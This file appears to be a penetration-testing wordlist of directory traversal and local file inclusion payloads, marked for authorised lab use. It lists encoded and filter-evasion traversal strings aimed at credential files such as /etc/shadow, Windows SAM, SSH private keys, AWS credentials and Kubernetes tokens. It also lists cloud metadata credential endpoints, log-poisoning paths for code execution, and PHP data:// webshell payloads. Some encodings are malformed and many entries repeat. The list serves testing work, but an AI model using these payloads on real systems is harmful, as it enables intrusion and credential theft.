# payloads/web/traversal.txt
# Directory traversal detection payloads — AUTHORISED LAB USE ONLY
# Advanced pentester edition — comprehensive coverage across all platforms
# Includes encoding bypass, filter evasion, platform-specific, and 2026-relevant vectors

# ── Basic path traversal (Unix/Linux) ───────────────────────
../
../../
../../../
../../../../
../../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../
../
../
../
../
../
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/shadow
../../../../../../../../../../etc/hosts
../../../../../../../../../../etc/hostname
../../../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/cmdline
../../../../../../../../../../proc/self/fd/0
../../../../../../../../../../proc/self/fd/1
../../../../../../../../../../proc/self/fd/2
../../../../../../../../../../etc/nginx/nginx.conf
../../../../../../../../../../etc/apache2/apache2.conf
../../../../../../../../../../etc/httpd/conf/httpd.conf

# ── Basic path traversal (Windows) ─────────────────────────
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\windows\system32\config\SAM
..\..\..\..\..\..\..\..\..\..\windows\repair\SAM
..\..\..\..\..\..\..\..\..\..\windows\repair\SYSTEM
..\..\..\..\..\..\..\..\..\..\windows\system32\config\SYSTEM

# ── URL-encoded traversal ───────────────────────────────────
..%2F
..%2F..%2F
..%2F..%2F..%2F
..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F
%2E%2E%2F
%2E%2E%2F%2E%2E%2F
%2E%2E%2F%2E%2E%2F%2E%2E%2F
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F
%2E%2E%5C
%2E%2E%5C%2E%2E%5C
%2E%2E%5C%2E%2E%5C%2E%2E%5C
%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C
%252E%252E%252F
%252E%252E%252F%252E%252E%252F
%252E%252E%252F%252E%252E%252F%252E%252E%252F
%252E%252E%255C
%252E%252E%255C%252E%252E%255C
%252E%252E%255C%252E%252E%255C%252E%252E%255C
%c0%2e%c0%2e%c0%af
%c0%2e%c0%2e%c0%2f
%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
..%c0%af
..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af
..%c1%9c
..%c1%9c..%c1%9c
..%c1%9c..%c1%9c..%c1%9c
%c0%9v
%c0%ae%c0%ae
%c1%1c
%c1%9c
%c0%9v
%c0%af
%c0%2f
%c0%5c
%c1%pc
%c0%9q
%c0%ae%c0%ae%c0%ae
%c1%1c..%c1%1c
..%c0%9v%c0%9v..%c0%9v%c0%9v
%c0%ae%c0%ae%255c
%u002e%u002e%u002f
%u002e%u002e%u005c
%%32%%65%%32%%65%%32%%66
%%32%65%%32%65%%32%66
%25%32%45%25%32%45%25%32%46
%25%32e%25%32e%25%32f
%25c0%25ae%25c0%25ae%25c0%25af
%uff0e%uff0e%uff0f
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
%c0%2e%c0%2e%c0%2f..%c0%2e%c0%2e%c0%2f
%25c0%25ae%25c0%25ae%25c0%25af

# ── Double / triple encoding ─────────────────────────────────
%252f
%252f..%252f..%252f..%252f
%2525%2525%252E%252E%252F
%25%32%66%25%32%66
%25%32%46%25%32%46%25%32%46
%25252F
%25252F%25252E%25252E%25252F
%25%32%35%25%32%46
%25%32%35%32%46
%25%32%35%25%32%35%25%32%46

# ── URI / path normalization bypass ──────────────────────────
..;/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/
..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/..;/..;/
..%3B/
..%3B..%3B/
..%3B..%3B..%3B/
..%3B..%3B..%3B..%3B/
..%3B..%3B..%3B..%3B..%3B/
..%3B/
..%3B/..%3B/
..%3B/..%3B/..%3B/
..%3B..%3B..%3B..%3B..%3B..%3B/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/..;
..;/..;/..;/..;/..;/..;/

# ── Traversal with file target (Linux) ──────────────────────
../../../etc/passwd
../../../etc/shadow
../../../etc/issue
../../../etc/group
../../../etc/hostname
../../../etc/motd
../../../etc/sudoers
../../../etc/crontab
../../../etc/fstab
../../../etc/mtab
../../../etc/resolv.conf
../../../etc/hosts
../../../etc/hosts.allow
../../../etc/hosts.deny
../../../etc/aliases
../../../etc/cron.d/*
../../../etc/ssh/sshd_config
../../../etc/ssh/ssh_config
../../../etc/my.cnf
../../../etc/mysql/my.cnf
../../../etc/php.ini
../../../etc/php5/apache2/php.ini
../../../etc/php7/apache2/php.ini
../../../etc/nginx/nginx.conf
../../../etc/nginx/sites-enabled/default
../../../etc/httpd/conf/httpd.conf
../../../etc/httpd/conf.d/ssl.conf
../../../etc/apache2/apache2.conf
../../../etc/apache2/sites-available/000-default.conf
../../../etc/apache2/sites-enabled/000-default.conf
../../../etc/init.d/*
../../../proc/1/environ
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/self/status
../../../proc/self/fd/0
../../../proc/self/fd/1
../../../proc/self/fd/2
../../../proc/self/maps
../../../proc/self/mem
../../../proc/self/cwd/index.html
../../../proc/self/root/etc/hostname
../../../proc/net/tcp
../../../proc/net/arp
../../../proc/net/route
../../../proc/net/fib_trie
../../../proc/version
../../../proc/cpuinfo
../../../proc/meminfo
../../../proc/partitions
../../../proc/diskstats
../../../proc/mounts
../../../proc/swaps
../../../proc/uptime
../../../proc/stat
../../../sys/kernel/notes
../../../boot.ini
../../../boot/grub/grub.cfg
../../../boot/grub/menu.lst

# ── Traversal with file target (Windows) ────────────────────
..\..\..\..\..\windows\win.ini
..\..\..\..\..\windows\system.ini
..\..\..\..\..\boot.ini
..\..\..\..\..\autoexec.bat
..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\windows\system32\drivers\etc\networks
..\..\..\..\..\windows\system32\config\SAM
..\..\..\..\..\windows\system32\config\SYSTEM
..\..\..\..\..\windows\system32\config\SECURITY
..\..\..\..\..\windows\system32\config\SOFTWARE
..\..\..\..\..\windows\repair\SAM
..\..\..\..\..\windows\repair\SYSTEM
..\..\..\..\..\windows\repair\SECURITY
..\..\..\..\..\windows\repair\SOFTWARE
..\..\..\..\..\windows\php.ini
..\..\..\..\..\windows\my.ini
..\..\..\..\..\inetpub\wwwroot\web.config
..\..\..\..\..\inetpub\wwwroot\global.asa
..\..\..\..\..\inetpub\logs\LogFiles\W3SVC1\*.log
..\..\..\..\..\inetpub\wwwroot\App_Data\*.mdf
..\..\..\..\..\Program Files\*\*.*
..\..\..\..\..\Users\*\AppData\Roaming\*\*.*
..\..\..\..\..\ProgramData\*\*.*
..\..\..\..\..\xampp\apache\conf\httpd.conf
..\..\..\..\..\xampp\php\php.ini
..\..\..\..\..\xampp\mysql\bin\my.ini
..\..\..\..\..\wamp\apache2\conf\httpd.conf
..\..\..\..\..\wamp\php\php.ini
..\..\..\..\..\wamp\mysql\my.ini
..\..\..\..\..\Program Files\FileZilla Server\FileZilla Server.xml
..\..\..\..\..\Program Files (x86)\FileZilla Server\FileZilla Server.xml

# ── Absolute path traversal ─────────────────────────────────
/etc/passwd
/etc/shadow
/proc/self/environ
/proc/1/cmdline
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/www/html/index.html
/var/www/html/config.php
/var/www/html/.env
/var/www/html/.git/config
C:\Windows\win.ini
C:\Windows\system.ini
C:\boot.ini
C:\autoexec.bat
C:\Windows\system32\drivers\etc\hosts

# ── Null byte injection (legacy PHP < 5.3) ─────────────────
../../../etc/passwd%00
../../../etc/passwd%00.html
../../../etc/passwd%00.php
../../../etc/passwd.txt%00
../../../etc/passwd%2500
../../../etc/passwd\x00
../../../etc/passwd\0
%00../../../etc/passwd
%00../../../etc/passwd%00
../../../etc/passwd%00&ext=.php
../../../etc/passwd%00.ext
../../../etc/passwd%00.txt
../../../etc/passwd%00.php
../../../etc/passwd%2500.html

# ── Common web files via traversal ──────────────────────────
../../../var/www/html/index.html
../../../var/www/html/index.php
../../../var/www/html/config.php
../../../var/www/html/config.inc.php
../../../var/www/html/db.php
../../../var/www/html/settings.php
../../../var/www/html/wp-config.php
../../../var/www/html/wp-config.php.bak
../../../var/www/html/.env
../../../var/www/html/.git/config
../../../var/www/html/.git/HEAD
../../../var/www/html/.htaccess
../../../var/www/html/.htpasswd
../../../var/www/html/robots.txt
../../../var/www/html/sitemap.xml
../../../var/www/html/admin/config.php
../../../var/www/html/phpinfo.php
../../../var/www/html/info.php
../../../var/www/html/dump.sql
../../../var/www/html/backup.sql
../../../var/www/html/error.log

# ── Log poisoning payloads (LFI → RCE) ──────────────────────
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/httpd/access_log
../../../var/log/httpd/error_log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/auth.log
../../../var/log/messages
../../../var/log/syslog
../../../var/log/mail.log
../../../var/log/maillog
../../../var/log/mysql/error.log
../../../var/log/mariadb/mariadb.log
../../../var/log/postgresql/postgresql-main.log
../../../var/log/sshd.log
../../../var/log/secure
../../../var/log/wtmp
../../../var/log/lastlog
../../../var/log/faillog
../../../proc/self/fd/2
../../../proc/self/fd/1
../../../proc/self/fd/0
../../../var/run/apache2.pid
../../../var/run/httpd.pid
../../../var/run/nginx.pid
../../../var/log/cron
../../../var/log/dmesg
../../../var/log/daemon.log
../../../var/log/kern.log
../../../var/log/apt/term.log
../../../var/log/apt/history.log

# ── PHP wrapper / protocol-based LFI ────────────────────────
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
php://filter/read=string.rot13/resource=config.php
php://filter/read=convert.iconv.utf-8.utf-7/resource=config.php
php://filter/convert.base64-encode/resource=admin/config.php
php://filter/convert.base64-encode/resource=wp-config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/convert.base64-encode/resource=../../../etc/nginx/nginx.conf
php://filter/convert.base64-encode/resource=../../../proc/self/environ
php://input
php://input
php://input%00
php://input%00.txt
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==
data://text/plain,<?php system('id');?>
data://text/plain,<?php echo file_get_contents('/etc/passwd');?>
data://text/plain;base64,PD9waHAgZWNobyAnUkNFOiAnLnNoZWxsX2V4ZWMoJ2lkJyk7ID8+
expect://id
file:///etc/passwd
file://localhost/etc/passwd
file:///var/www/html/index.php

# ── Double dot / dot-dot-slash variations ────────────────────
....//
....//
....//
.....//
......//
.......//
........//
.........//
..........//
....\...\...\
....\\....\\....\\
..././../
..././..././
..././..././..././
..././..././..././..././
.../../.../../.../../
..%252f..%252f..%252f
..%252f..%252f..%252f..%252f
..%252f..%252f..%252f..%252f..%252f
..%252f..%252f..%252f..%252f..%252f..%252f
..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c1%9c..%c1%9c..%c1%9c
..%c1%9c..%c1%9c..%c1%9c..%c1%9c
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c

# ── iOS / macOS specific ─────────────────────────────────────
../../../System/Library/CoreServices/SystemVersion.plist
../../../var/log/system.log
../../../var/log/secure.log
../../../private/etc/passwd
../../../private/etc/master.passwd
../../../private/etc/ssh/sshd_config
../../../private/etc/sudoers
../../../private/var/db/dslocal/nodes/Default/users/root.plist
../../../Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
../../../Users/*/Library/Keychains/login.keychain-db

# ── Cloud / container specific ──────────────────────────────
../../../home/ec2-user/.ssh/authorized_keys
../../../home/ec2-user/.ssh/id_rsa
../../../home/ubuntu/.ssh/authorized_keys
../../../home/ubuntu/.ssh/id_rsa
../../../root/.ssh/authorized_keys
../../../root/.ssh/id_rsa
../../../root/.bash_history
../../../root/.mysql_history
../../../root/.aws/credentials
../../../root/.aws/config
../../../root/.docker/config.json
../../../home/*/.kube/config
../../../etc/kubernetes/admin.conf
../../../var/run/secrets/kubernetes.io/serviceaccount/token
../../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt
../../../var/run/secrets/kubernetes.io/serviceaccount/namespace
../../../.dockerenv
../../../run/secrets/*
../../../proc/1/cgroup
../../../proc/1/mountinfo

# ── Cloud metadata service ──────────────────────────────────
/latest/meta-data/
/latest/meta-data/iam/security-credentials/
/latest/meta-data/iam/security-credentials/admin-role
/latest/meta-data/public-keys/0/openssh-key
/latest/meta-data/local-ipv4
/latest/meta-data/public-ipv4
/latest/meta-data/hostname
/latest/user-data
/latest/dynamic/instance-identity/document
/latest/meta-data/placement/availability-zone
/computeMetadata/v1beta1/instance/service-accounts/default/token
/computeMetadata/v1/instance/service-accounts/default/token
/metadata/instance?api-version=2021-02-01
/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com

# ── Database files ──────────────────────────────────────────
../../../var/lib/mysql/mysql/user.MYD
../../../var/lib/mysql/mysql/user.MYI
../../../var/lib/mysql/mysql/user.frm
../../../var/lib/mysql/mysql/db.MYD
../../../var/lib/mysql/db.opt
../../../var/lib/pgsql/data/pg_hba.conf
../../../var/lib/pgsql/data/postgresql.conf
../../../var/lib/pgsql/data/pgpass
../../../etc/mysql/my.cnf
../../../etc/mysql/mariadb.cnf
../../../etc/mysql/mariadb.conf.d/50-server.cnf
../../../var/lib/mysql/ibdata1
../../../var/lib/mysql/ib_logfile0
../../../var/lib/mongodb/mongod.lock
../../../var/lib/mongodb/*.ns
../../../var/lib/mongodb/*.0
../../../var/lib/mongodb/*.1
../../../var/lib/redis/dump.rdb
../../../var/lib/redis/appendonly.aof

# ── Source code / version control ───────────────────────────
../../../.git/config
../../../.git/HEAD
../../../.git/logs/HEAD
../../../.git/ORIG_HEAD
../../../.git/packed-refs
../../../.git/refs/heads/master
../../../.git/refs/heads/main
../../../.git/refs/remotes/origin/HEAD
../../../.git/index
../../../.git/objects/pack/*.idx
../../../.git/objects/pack/*.pack
../../../.svn/entries
../../../.svn/wc.db
../../../.svn/all-wcprops
../../../.hg/dirstate
../../../.hg/store/00manifest.i
../../../.hg/requires
../../../CVS/Root
../../../CVS/Repository
../../../.DS_Store
../../../.env
../../../.env.local
../../../.env.production
../../../.env.development
../../../.env.staging
../../../.env.backup
../../../env.php
../../../.config
../../../.babel.json
../../../.eslintrc
../../../.prettierrc
../../../.npmrc
../../../.yarnrc
../../../composer.json
../../../composer.lock
../../../package.json
../../../package-lock.json
../../../yarn.lock
../../../webpack.config.js
../../../vite.config.js
../../../next.config.js
../../../nuxt.config.js
../../../docker-compose.yml
../../../docker-compose.yaml
../../../Dockerfile
../../../.dockerignore
../../../Makefile
../../../README.md
../../../CHANGELOG.md
../../../Gemfile
../../../Gemfile.lock
../../../go.mod
../../../go.sum
../../../pom.xml
../../../build.gradle
../../../requirements.txt
../../../Pipfile
../../../Pipfile.lock

# ── JAR / WAR / deployment ──────────────────────────────────
../../../WEB-INF/web.xml
../../../WEB-INF/applicationContext.xml
../../../WEB-INF/dwr.xml
../../../WEB-INF/struts-config.xml
../../../WEB-INF/struts.xml
../../../WEB-INF/actions.xml
../../../META-INF/MANIFEST.MF
../../../META-INF/application.xml
../../../META-INF/context.xml

# ── Java-specific resources ────────────────────────────────
../../../WEB-INF/classes/application.properties
../../../WEB-INF/classes/hibernate.cfg.xml
../../../WEB-INF/classes/log4j.properties
../../../WEB-INF/classes/logback.xml
../../../WEB-INF/classes/jdbc.properties
../../../WEB-INF/classes/database.properties
../../../WEB-INF/classes/db.properties
../../../WEB-INF/classes/config.properties
../../../WEB-INF/classes/*.class
file:///etc/passwd
file:///proc/self/environ
file://localhost/etc/passwd
file:///var/www/html/index.php
file:///C:/Windows/win.ini
file:///C:/boot.ini

# ── ZIP / archive wrappers ──────────────────────────────────
zip://file.zip%23directory/file.txt
zip://../../../etc/passwd.zip%23passwd
compress.zlib://../../../etc/passwd
compress.bzip2://../../../etc/passwd
phar://test.phar/test.txt

# ── Path + parameter injection ──────────────────────────────
../../../etc/passwd?
../../../etc/passwd%00
../../../etc/passwd%20
../../../etc/passwd%09
../../../etc/passwd%0a
../../../etc/passwd%0d%0a
../../../etc/passwd%00.html
../../../etc/passwd%2500
../../../etc/passwd%00.txt
../../../etc/passwd{
../../../etc/passwd\
../../../etc/passwd..
../../../etc/passwd/.
../../../etc/passwd/./
../../../etc/passwd///
../../../etc/passwd/%%32%65

# ── Traversal + null byte + extension append ─────────────────
../../../etc/passwd%00
../../../etc/passwd%00.html
../../../etc/passwd%00.php
../../../etc/passwd%00.txt
../../../etc/passwd%00.bak
../../../etc/passwd%00.ext
../../../etc/passwd%2500.html
../../../etc/passwd%00?ext=.php
../../../etc/passwd%2500
../../../etc/passwd%00%3Fext%3D.php
../../../etc/passwd%00%00%00
../../../etc/passwd%00.png
../../../etc/passwd%00.jpg
../../../etc/passwd%00.gif

# ── Java / Servlet resource path ─────────────────────────────
/WEB-INF/web.xml
/WEB-INF/applicationContext.xml
/WEB-INF/classes/application.properties
/WEB-INF/classes/log4j.properties
/WEB-INF/dwr.xml
/META-INF/MANIFEST.MF
/index.jsp
/index.do
/../../WEB-INF/web.xml
/../../../WEB-INF/web.xml

# ── Node.js / Express specific ──────────────────────────────
../../../package.json
../../../package-lock.json
../../../yarn.lock
../../../node_modules/*
../../../node_modules/.package-lock.json
../../../node_modules/express/package.json
../../../server.js
../../../app.js
../../../index.js
../../../.env
../../../.env.production
../../../config.js
../../../config/default.json
../../../config/production.json
../../../config/custom-environment-variables.json
../../../.next/build-manifest.json
../../../.next/server/pages-manifest.json
../../../.next/routes-manifest.json
../../../next.config.js
../../../nuxt.config.js
../../../vue.config.js
../../../svelte.config.js
../../../angular.json

# ── Ruby on Rails specific ──────────────────────────────────
../../../config/routes.rb
../../../config/database.yml
../../../config/application.rb
../../../config/environments/production.rb
../../../config/secrets.yml
../../../config/master.key
../../../config/credentials.yml.enc
../../../Gemfile
../../../Gemfile.lock
../../../db/schema.rb
../../../db/migrate/*
../../../app/controllers/application_controller.rb
../../../app/models/application_record.rb
../../../app/views/layouts/application.html.erb
../../../storage/*
../../../tmp/*
../../../log/*.log

# ── Django / Python specific ────────────────────────────────
../../../settings.py
../../../manage.py
../../../requirements.txt
../../../Pipfile
../../../Pipfile.lock
../../../.env
../../../db.sqlite3
../../../config/settings.py
../../../config/urls.py
../../../config/wsgi.py
../../../config/asgi.py
../../../mysite/settings.py
../../../app/views.py
../../../app/models.py
../../../app/admin.py
../../../app/urls.py
../../../__init__.py
../../../__pycache__/*
../../../venv/*
../../../.venv/*
../../../pyproject.toml
../../../poetry.lock
../../../tox.ini
../../../setup.py
../../../setup.cfg

# ── Tape archive / backup files ─────────────────────────────
../../../backup.tar.gz
../../../backup.tar.bz2
../../../backup.zip
../../../backup.rar
../../../backup.7z
../../../backup.sql
../../../backup.sql.gz
../../../backup.sql.bz2
../../../backup.tar
../../../www.tar.gz
../../../www.zip
../../../site.tar.gz
../../../site.zip
../../../dump.sql
../../../dump.rdb
../../../db_backup.sql
../../../data.sql
../../../mysql_backup.sql
../../../*.sql
../../../*.tar.gz
../../../*.zip
../../../*.bak
../../../*.old
../../../*.orig
../../../~*
../../../*~
../../../*.swp
../../../*.swo
../../../*.swn
../../../*.tmp
../../../*.temp
../../../*.log
../../../*.log.*

# ── Symlink / race condition test ───────────────────────────
../../../proc/1/cwd/etc/passwd
../../../proc/1/root/etc/passwd
../../../proc/1/fd/0
../../../proc/1/fd/1
../../../proc/1/fd/2
../../../dev/fd/0
../../../dev/fd/1
../../../dev/fd/2
../../../dev/stdin
../../../dev/stdout
../../../dev/stderr

# ── Long path / buffer overflow testing ─────────────────────
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
../
etc/passwd

# ── Unicode / wide character bypass ─────────────────────────
%uff0e%uff0e%u2215
%uff0e%uff0e%uff0f
%uff0e%uff0e%u2216
%c0%2e%c0%2e%c0%af
%e0%40%ae%e0%40%ae%e0%40%af
%e0%80%ae%e0%80%ae%e0%80%af
%e0%80%ae
%f0%80%80%ae
%f0%80%80%ae%f0%80%80%ae%f0%80%80%af
%f8%80%80%80%ae
%fc%80%80%80%80%ae
..%U+2215
..%u2215
..%U+2216
..%u2216
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fshadow
%uff0e%uff0e%u2215etc%u2215passwd